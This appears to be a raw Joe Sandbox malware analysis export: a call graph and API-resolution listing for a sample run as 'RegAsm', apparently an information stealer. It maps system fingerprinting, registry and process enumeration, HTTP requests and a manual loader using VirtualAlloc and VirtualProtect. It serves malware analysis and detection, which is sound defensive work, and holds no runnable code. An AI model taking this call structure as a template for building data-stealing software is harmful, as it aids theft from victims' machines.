415203 82447->82448 82449 40fa28 lstrcpy 82448->82449 82450 415210 82449->82450 82451 40fae3 4 API calls 82450->82451 82452 415230 82451->82452 82453 40fa28 lstrcpy 82452->82453 82454 41523d 82453->82454 82932 410032 _EH_prolog 82454->82932 82457 40fa6f 3 API calls 82458 415267 82457->82458 82459 40fa28 lstrcpy 82458->82459 82460 415274 82459->82460 82461 40fae3 4 API calls 82460->82461 82462 4152a3 82461->82462 82463 40fa28 lstrcpy 82462->82463 82464 4152b0 82463->82464 82465 40fae3 4 API calls 82464->82465 82466 4152d3 82465->82466 82467 40fa28 lstrcpy 82466->82467 82468 4152e0 82467->82468 82938 41030b _EH_prolog 82468->82938 82470 4152fb 82471 40fa6f 3 API calls 82470->82471 82472 415310 82471->82472 82473 40fa28 lstrcpy 82472->82473 82474 41531d 82473->82474 82475 40fae3 4 API calls 82474->82475 82476 41534f 82475->82476 82477 40fa28 lstrcpy 82476->82477 82478 41535c 82477->82478 82479 40fae3 4 API calls 82478->82479 82480 41537f 82479->82480 82481 40fa28 lstrcpy 82480->82481 82482 41538c 82481->82482 82946 4100b9 _EH_prolog 82482->82946 82484 4153ac 82485 40fa6f 3 API calls 82484->82485 82486 4153c2 82485->82486 82487 40fa28 lstrcpy 82486->82487 82488 4153cf 82487->82488 82489 4100b9 15 API calls 82488->82489 82490 4153fe 82489->82490 82491 40fa6f 3 API calls 82490->82491 82492 415414 82491->82492 82493 40fa28 lstrcpy 82492->82493 82494 415421 82493->82494 82495 40fae3 4 API calls 82494->82495 82496 415453 82495->82496 82497 40fa28 lstrcpy 82496->82497 82498 415460 82497->82498 82499 415477 lstrlenA 82498->82499 82500 415487 82499->82500 82501 40f96a lstrcpy 82500->82501 82502 41549d 82501->82502 82503 4010b1 2 API calls 82502->82503 82504 4154b5 82503->82504 82962 414519 _EH_prolog 82504->82962 82506 4154c5 82507 401061 _EH_prolog 82506->82507 82508 4154ee 82507->82508 82508->80927 82510 40f9a1 lstrcpy 82509->82510 82511 404206 82510->82511 82512 403a7d 6 API calls 82511->82512 82513 404212 GetProcessHeap RtlAllocateHeap 82512->82513 83234 40fb94 82513->83234 82515 40424c InternetOpenA StrCmpCA 82516 40426b 82515->82516 82517 4043a1 InternetCloseHandle 82516->82517 82518 404276 InternetConnectA 82516->82518 82525 404312 82517->82525 82519 404296 HttpOpenRequestA 82518->82519 82520 404398 InternetCloseHandle 82518->82520 82521 404391 InternetCloseHandle 82519->82521 82522 4042cb 82519->82522 82520->82517 82521->82520 82523 4042e5 HttpSendRequestA HttpQueryInfoA 82522->82523 82524 4042cf InternetSetOptionA 82522->82524 82523->82525 82527 404335 82523->82527 82524->82523 82525->80932 82526 40434f InternetReadFile 82526->82521 82526->82527 82527->82521 82527->82525 82527->82526 83235 40612e 82528->83235 82530 40efa2 82531 4010b1 2 API calls 82530->82531 82532 40efb3 82531->82532 83474 40e7ff 9 API calls 82532->83474 82534 40ed97 StrCmpCA 82541 40ed6f 82534->82541 82536 4010b1 2 API calls 82538 40efc6 82536->82538 82537 40ee0b StrCmpCA 82537->82541 83517 40bc3c _EH_prolog 82538->83517 82539 40f9a1 lstrcpy 82539->82541 82541->82530 82541->82534 82541->82537 82541->82539 82542 40f96a lstrcpy 82541->82542 82543 40ef27 StrCmpCA 82541->82543 82548 4010b1 _EH_prolog lstrcpy 82541->82548 82550 40fa6f 3 API calls 82541->82550 82551 40fae3 _EH_prolog lstrlenA lstrcpy lstrcat 82541->82551 82554 40fa28 lstrcpy 82541->82554 83238 40d44e _EH_prolog 82541->83238 83292 40d708 _EH_prolog 82541->83292 83404 40b902 _EH_prolog 82541->83404 82542->82541 82543->82541 82548->82541 82550->82541 82551->82541 82554->82541 82786 40f96a lstrcpy 82785->82786 82787 402150 82786->82787 82787->81702 82789 401081 82788->82789 82789->81755 82790->81702 82791->81702 82792->81702 82793->81702 82794->81748 82795->81759 82796->81749 82797->81732 82798->81716 82799->81717 82800->81716 82801->81696 82802->81716 82804 40f96a lstrcpy 82803->82804 82805 40216a 82804->82805 82805->81687 82806->81697 82807->81749 82809 410508 82808->82809 82810 40f96a lstrcpy 82809->82810 82811 410518 82810->82811 82811->81791 82812->81795 82814 403a96 82813->82814 82814->82814 82815 403a9d ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 82814->82815 82824 40fb94 82815->82824 82817 403adf lstrlenA 82825 40fb94 82817->82825 82819 403aef InternetCrackUrlA 82820 403b0d 82819->82820 82820->81804 82821->81929 82823 40f9dc 82822->82823 82823->81853 82824->82817 82825->82819 82826->81938 82827->82119 82828->82121 82829->82123 82830->82125 82831->82129 82832->82131 82834 40594c 82833->82834 82835 4062bf LocalAlloc 82833->82835 82834->81982 82834->81983 82835->82834 82836 4062cf CryptStringToBinaryA 82835->82836 82836->82834 82837 4062e6 LocalFree 82836->82837 82837->82834 82838->82139 82839->82147 82840->82158 82842 40f96a lstrcpy 82841->82842 82843 402102 82842->82843 82843->82174 82844->82191 82846 4104c4 CharToOemA 82845->82846 82847 4104a9 RegQueryValueExA 82845->82847 82846->82205 82847->82846 82850 411027 82849->82850 82851 41100b K32GetModuleFileNameExA CloseHandle 82849->82851 82852 40f96a lstrcpy 82850->82852 82851->82850 82853 411036 82852->82853 82853->82249 82981 40fc04 82854->82981 82857 4106c6 RegOpenKeyExA 82858 4106e6 RegQueryValueExA 82857->82858 82859 4106bf 82857->82859 82858->82859 82859->82271 82861 410807 82860->82861 82862 41080f CoSetProxyBlanket 82861->82862 82865 41090b 82861->82865 82864 41083f 82862->82864 82863 40f96a lstrcpy 82866 41091f 82863->82866 82864->82865 82867 410847 82864->82867 82865->82863 82866->82285 82867->82866 82868 410873 VariantInit 82867->82868 82869 410895 82868->82869 82987 41070c CoCreateInstance 82869->82987 82871 4108a3 FileTimeToSystemTime GetProcessHeap HeapAlloc wsprintfA 82872 40f96a lstrcpy 82871->82872 82873 4108ff VariantClear 82872->82873 82873->82866 82875 410990 82874->82875 82876 410a30 82875->82876 82877 410998 CoSetProxyBlanket 82875->82877 82878 40f96a lstrcpy 82876->82878 82879 4109c8 82877->82879 82881 410a44 82878->82881 82879->82876 82880 4109cc 82879->82880 82880->82881 82882 4109f0 VariantInit 82880->82882 82881->82299 82883 410a12 82882->82883 82993 410c73 LocalAlloc CharToOemW 82883->82993 82885 410a1a 82886 40f96a lstrcpy 82885->82886 82887 410a24 VariantClear 82886->82887 82887->82881 82889 40fc7a 82888->82889 82889->82313 82890->82326 82892 40f96a lstrcpy 82891->82892 82893 410455 82892->82893 82893->82341 82895 40f96a lstrcpy 82894->82895 82896 40fd54 GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 82895->82896 82897 40fe3f 82896->82897 82903 40fd8f 82896->82903 82898 40fe50 82897->82898 82899 40fe47 LocalFree 82897->82899 82898->82355 82899->82898 82900 40fd94 GetLocaleInfoA 82900->82903 82901 40fae3 _EH_prolog lstrlenA lstrcpy lstrcat 82901->82903 82902 40fa28 lstrcpy 82902->82903 82903->82897 82903->82900 82903->82901 82903->82902 82904->82368 82906 40fd27 82905->82906 82907 40fd0b wsprintfA 82905->82907 82906->82383 82907->82906 82909 40fea2 RegQueryValueExA 82908->82909 82910 40feba 82908->82910 82909->82910 82910->82401 82912 40ff4d GetLogicalProcessorInformationEx 82911->82912 82913 40ff23 GetLastError 82912->82913 82914 40ff58 82912->82914 82915 40ffac 82913->82915 82916 40ff2e 82913->82916 82996 410ac4 GetProcessHeap HeapFree 82914->82996 82918 40ffb6 82915->82918 82997 410ac4 GetProcessHeap HeapFree 82915->82997 82924 40ff32 82916->82924 82918->82415 82919 40ff7f 82919->82918 82923 40ff85 wsprintfA 82919->82923 82923->82918 82924->82912 82925 40ffa5 82924->82925 82994 410ac4 GetProcessHeap HeapFree 82924->82994 82995 410ae1 GetProcessHeap HeapAlloc 82924->82995 82925->82918 82926->82428 82998 410a8d 82927->82998 82930 410009 wsprintfA 82930->82442 82933 40f96a lstrcpy 82932->82933 82937 410058 82933->82937 82934 410094 EnumDisplayDevicesA 82935 4100a9 82934->82935 82934->82937 82935->82457 82936 40f9de 2 API calls 82936->82937 82937->82934 82937->82935 82937->82936 82939 40f96a lstrcpy 82938->82939 82940 410335 CreateToolhelp32Snapshot Process32First 82939->82940 82941 4103ce CloseHandle 82940->82941 82945 410366 82940->82945 82941->82470 82942 4103ba Process32Next 82942->82941 82942->82945 82943 40fae3 _EH_prolog lstrlenA lstrcpy lstrcat 82943->82945 82944 40fa28 lstrcpy 82944->82945 82945->82942 82945->82943 82945->82944 82947 40f96a lstrcpy 82946->82947 82948 4100dd RegOpenKeyExA 82947->82948 82949 410110 82948->82949 82950 41012f 82948->82950 82951 40f9a1 lstrcpy 82949->82951 82952 410138 RegEnumKeyExA 82950->82952 82954 4102cb 82950->82954 82959 41023a RegQueryValueExA 82950->82959 82960 40fa28 lstrcpy 82950->82960 82961 40fae3 _EH_prolog lstrlenA lstrcpy lstrcat 82950->82961 82957 41011c 82951->82957 82952->82950 82953 410161 wsprintfA RegOpenKeyExA 82952->82953 82953->82954 82955 4101a5 RegQueryValueExA 82953->82955 82958 40f9a1 lstrcpy 82954->82958 82955->82950 82956 4101cf lstrlenA 82955->82956 82956->82950 82957->82484 82958->82957 82959->82950 82960->82950 82961->82950 83000 413455 _EH_prolog 82962->83000 82964 41453c 82965 40fa28 lstrcpy 82964->82965 82966 41455e 82965->82966 82967 40fa28 lstrcpy 82966->82967 82968 414582 82967->82968 82969 40fa28 lstrcpy 82968->82969 82970 41458e 82969->82970 82971 40fa28 lstrcpy 82970->82971 82972 41459a 82971->82972 82973 4145a1 Sleep 82972->82973 82974 4145b1 CreateThread WaitForSingleObject 82972->82974 82973->82972 82975 40f96a lstrcpy 82974->82975 83004 41331b _EH_prolog 82974->83004 82976 4145df 82975->82976 83002 4134a1 _EH_prolog 82976->83002 82978 4145f2 82979 401061 _EH_prolog 82978->82979 82980 4145fe 82979->82980 82980->82506 82984 40fb97 GetProcessHeap HeapAlloc RegOpenKeyExA 82981->82984 82983 40fc09 82983->82857 82983->82859 82985 40fbf1 82984->82985 82986 40fbda RegQueryValueExA 82984->82986 82985->82983 82986->82985 82988 410736 SysAllocString 82987->82988 82989 410797 82987->82989 82988->82989 82991 410746 82988->82991 82989->82871 82990 410793 SysFreeString 82990->82989 82991->82990 82992 410779 _wtoi64 SysFreeString 82991->82992 82992->82990 82993->82885 82994->82924 82995->82924 82996->82919 82997->82918 82999 40fff3 GlobalMemoryStatusEx 82998->82999 82999->82930 83001 41346e 83000->83001 83001->82964 83003 4134c1 83002->83003 83003->82978 83013 40fb94 83004->83013 83006 41333c lstrlenA 83007 413348 83006->83007 83011 413353 83006->83011 83008 40f9a1 lstrcpy 83008->83011 83010 40fa28 lstrcpy 83010->83011 83011->83008 83011->83010 83012 4133fb StrCmpCA 83011->83012 83014 4043d6 _EH_prolog 83011->83014 83012->83007 83012->83011 83013->83006 83015 40f9a1 lstrcpy 83014->83015 83016 404406 83015->83016 83017 403a7d 6 API calls 83016->83017 83018 404412 83017->83018 83221 410d92 83018->83221 83020 40443e 83021 404449 lstrlenA 83020->83021 83022 404459 83021->83022 83023 410d92 4 API calls 83022->83023 83024 404467 83023->83024 83025 40f96a lstrcpy 83024->83025 83026 404477 83025->83026 83027 40f96a lstrcpy 83026->83027 83028 404488 83027->83028 83029 40f96a lstrcpy 83028->83029 83030 404499 83029->83030 83031 40f96a lstrcpy 83030->83031 83032 4044aa 83031->83032 83033 40f96a lstrcpy 83032->83033 83034 4044bb StrCmpCA 83033->83034 83037 4044d7 83034->83037 83035 4044fd 83036 410b42 3 API calls 83035->83036 83038 404508 83036->83038 83037->83035 83039 4044ec InternetOpenA 83037->83039 83040 40fa6f 3 API calls 83038->83040 83039->83035 83048 404d30 83039->83048 83041 40451e 83040->83041 83042 40fa28 lstrcpy 83041->83042 83043 40452b 83042->83043 83044 40fae3 4 API calls 83043->83044 83045 404557 83044->83045 83046 40fa6f 3 API calls 83045->83046 83047 40456d 83046->83047 83049 40fae3 4 API calls 83047->83049 83051 40f9a1 lstrcpy 83048->83051 83050 404581 83049->83050 83052 40fa28 lstrcpy 83050->83052 83062 404c8c 83051->83062 83053 40458e 83052->83053 83054 40fae3 4 API calls 83053->83054 83055 4045c7 83054->83055 83056 40fa6f 3 API calls 83055->83056 83057 4045da 83056->83057 83058 40fa28 lstrcpy 83057->83058 83059 4045e7 83058->83059 83060 4045ff InternetConnectA 83059->83060 83060->83048 83062->83011 83222 410da3 CryptBinaryToStringA 83221->83222 83224 410d9f 83221->83224 83223 410dc0 GetProcessHeap RtlAllocateHeap 83222->83223 83222->83224 83223->83224 83225 410ddd CryptBinaryToStringA 83223->83225 83224->83020 83225->83224 83234->82515 83594 4060f7 83235->83594 83237 40613d 83237->82541 83239 40f96a lstrcpy 83238->83239 83240 40d472 83239->83240 83647 410d07 SHGetFolderPathA 83240->83647 83243 40fa6f 3 API calls 83244 40d49c 83243->83244 83245 40fa28 lstrcpy 83244->83245 83246 40d4a9 83245->83246 83247 40fa6f 3 API calls 83246->83247 83248 40d4d1 83247->83248 83293 40f96a lstrcpy 83292->83293 83294 40d72c 83293->83294 83295 40f96a lstrcpy 83294->83295 83296 40d73d 83295->83296 83297 40d756 StrCmpCA 83296->83297 83298 40d767 83297->83298 83299 40d9ea 83297->83299 83300 410d07 2 API calls 83298->83300 83301 410d07 2 API calls 83299->83301 83302 40d770 83300->83302 83303 40d9f3 83301->83303 83304 40fa6f 3 API calls 83302->83304 83305 40fa6f 3 API calls 83303->83305 83307 40d783 83304->83307 83306 40da06 83305->83306 83308 40fa28 lstrcpy 83306->83308 83309 40fa28 lstrcpy 83307->83309 83405 40f96a lstrcpy 83404->83405 83406 40b925 83405->83406 83407 40f96a lstrcpy 83406->83407 83408 40b936 83407->83408 83409 410d07 2 API calls 83408->83409 83410 40b945 83409->83410 83411 40fa6f 3 API calls 83410->83411 83412 40b958 83411->83412 83413 40fa28 lstrcpy 83412->83413 83414 40b965 83413->83414 83415 40fa6f 3 API calls 83414->83415 83475 40ed34 83474->83475 83476 40e8d5 RegGetValueA 83474->83476 83477 401061 _EH_prolog 83475->83477 83478 40e8f9 83476->83478 83482 40e913 83476->83482 83479 40ed40 83477->83479 83478->83475 83479->82536 83480 40e929 RegOpenKeyExA 83480->83475 83481 40e944 RegEnumKeyExA 83480->83481 83481->83478 83483 40e961 83481->83483 83482->83478 83482->83480 83484 40f96a lstrcpy 83483->83484 83506 40e96e 83484->83506 83485 40e9cc RegGetValueA 83500 40ebb4 StrCmpCA 83500->83506 83501 40fae3 _EH_prolog lstrlenA lstrcpy lstrcat 83501->83506 83503 40fa28 lstrcpy 83503->83506 83504 40ec5c RegEnumKeyExA memset memset 83504->83506 83506->83485 83506->83500 83506->83501 83506->83503 83506->83504 84474 40e346 155 API calls 83506->84474 84475 40dd57 83506->84475 83518 40f96a lstrcpy 83517->83518 83519 40bc60 83518->83519 83595 406102 83594->83595 83598 405fc3 83595->83598 83597 406113 83597->83237 83601 405e5c 83598->83601 83602 405e75 83601->83602 83612 405e6d 83601->83612 83617 4059f3 83602->83617 83606 405ea8 83606->83612 83629 405c81 83606->83629 83610 405f22 83610->83612 83643 410ac4 GetProcessHeap HeapFree 83610->83643 83612->83597 83613 405f63 FreeLibrary 83613->83613 83614 405f75 83613->83614 83642 410ac4 GetProcessHeap HeapFree 83614->83642 83619 405a02 83617->83619 83618 405a09 83618->83612 83623 405aa6 83618->83623 83619->83618 83620 405a59 83619->83620 83644 410ae1 GetProcessHeap HeapAlloc 83620->83644 83622 405a68 83622->83618 83624 405aee VirtualAlloc 83623->83624 83628 405ac5 83623->83628 83625 405b1e 83624->83625 83626 405b24 83624->83626 83625->83626 83627 405b29 VirtualAlloc 83625->83627 83626->83606 83627->83626 83628->83624 83630 405da9 83629->83630 83631 405c9b 83629->83631 83630->83612 83638 405dbc 83630->83638 83631->83630 83632 405cb5 LoadLibraryA 83631->83632 83633 405daf 83632->83633 83636 405ccf 83632->83636 83633->83630 83635 405d7b GetProcAddress 83635->83633 83635->83636 83636->83631 83636->83633 83636->83635 83645 410ae1 GetProcessHeap HeapAlloc 83636->83645 83646 410ac4 GetProcessHeap HeapFree 83636->83646 83639 405e51 83638->83639 83641 405dd2 83638->83641 83639->83610 83639->83612 83639->83613 83639->83614 83640 405e27 VirtualProtect 83640->83639 83640->83641 83641->83639 83641->83640 83642->83610 83643->83612 83644->83622 83645->83636 83646->83636 83648 40f96a lstrcpy 83647->83648 83649 40d489 83648->83649 83649->83243 84474->83506 84787 4138dc 84788 4138e7 84787->84788 84789 401061 _EH_prolog 84788->84789 84790 4138f3 84789->84790

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 004177AB Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74DD0000,00416BAD), ref: 004177BF
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004177D6
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004177ED
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417804
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041781B
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417832
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417849
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417860
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417877
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041788E
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004178A5
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004178BC
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004178D3
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004178EA
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417901
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417918
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041792F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417946
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041795D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417974
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041798B
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004179A2
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004179B9
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004179D0
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004179E7
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004179FE
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417A15
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417A2C
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417A43
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417A5A
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417A71
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417A88
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417A9F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417AB6
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417ACD
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417AE4
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417AFB
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417B12
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417B29
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417B40
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417B57
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417B6E
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417B85
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00416BAD,?,00000040,00000064,0041365F,00412CF8,?,0000002C,00000064,004135DE,0041361B,?,00000024,00000064,Function_000135A1,0041328A), ref: 00417B96
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00417BA7
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00417BB8
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00417BC9
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00417BDA
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00417BEB
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00417BFC
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32 ref: 00417C0D
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417C1D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75290000), ref: 00417C38
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417C4F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417C66
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417C7D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417C94
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(73770000), ref: 00417CB3
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417CCA
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417CE1
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417CF8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417D0F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417D26
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417D3D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417D54
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(752C0000), ref: 00417D6F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417D86
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417D9D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417DB4
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417DCB
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(74EC0000), ref: 00417DEA
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417E01
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417E18
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417E2F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417E46
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417E5D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000), ref: 00417E7C
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417E93
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417EAA
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417EC1
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417ED8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417EEF
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417F06
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417F1D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417F34
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000), ref: 00417F4F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417F66
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417F7D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417F94
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417FAB
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000), ref: 00417FC6
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00417FDD
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000), ref: 00417FF8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041800F
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000), ref: 0041802E
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418045
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041805C
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418073
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041808A
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004180A1
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004180B8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004180CF
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004180E5
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004180FB
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000), ref: 00418116
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041812D
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 00418144
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 0041815B
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75D90000), ref: 00418176
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CD30000), ref: 00418191
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004181A8
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004181BF
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32 ref: 004181D6
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6CB40000,SymMatchString), ref: 004181F0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                  • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                                                                                                                                                                                                  • API String ID: 2238633743-951535364
                                                                                                                                                                                                                                                                  • Opcode ID: b597368e23403ece8e30bfffffdf34afae03105a4bcb55b39a96af6463799f32
                                                                                                                                                                                                                                                                  • Instruction ID: 947a39d6f177ff9c76431e3259350fa4a8ed10c5e7642feaf3c00701d84725fe
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b597368e23403ece8e30bfffffdf34afae03105a4bcb55b39a96af6463799f32
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7420D7D454241EFEB525FA0FD58A653BB7F70BB81314702AEA058A234DB3248E9EF50
                                                                                                                                                                                                                                                                  Function 0040C6CD Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

